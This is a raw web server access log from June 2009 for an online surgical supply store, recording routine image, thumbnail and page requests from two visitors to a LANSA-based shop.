59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
60.51.124.240 - - [15/Jun/2009:01:11:42 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.16.152.82 - - [15/Jun/2009:01:11:42 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:42 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:42 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:42 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
60.51.124.240 - - [15/Jun/2009:01:11:43 -0400] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.16.152.82 - - [15/Jun/2009:01:11:43 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:44 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
60.51.124.240 - - [15/Jun/2009:01:11:44 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.16.152.82 - - [15/Jun/2009:01:11:45 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
60.51.124.240 - - [15/Jun/2009:01:11:46 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:47 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:47 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:48 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:48 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:48 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:53 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
60.51.124.240 - - [15/Jun/2009:01:11:53 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.16.152.82 - - [15/Jun/2009:01:11:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG HTTP/1.1" 200 71817 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
60.51.124.240 - - [15/Jun/2009:01:11:54 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
59.16.152.82 - - [15/Jun/2009:01:11:55 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 200 2313 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L002578456842B3002CDF01B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)"
